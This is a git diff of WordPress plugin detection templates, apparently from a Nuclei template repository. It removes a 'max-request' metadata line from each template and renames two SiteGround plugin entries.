index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..dc3d446af3 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -1,13 +1,12 @@
 id: wordpress-sg-cachepress
 
 info:
-  name: SiteGround Optimizer Detection
+  name: Speed Optimizer – The All-In-One WordPress Performance-Boosting Plugin Detection
   author: ricardomaia
   severity: info
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..96b4699d2d 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -1,13 +1,12 @@
 id: wordpress-sg-security
 
 info:
-  name: All-inclusive Security Solution by SiteGround Detection
+  name: Security Optimizer – The All-In-One WordPress Protection Plugin Detection
   author: ricardomaia
   severity: info
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
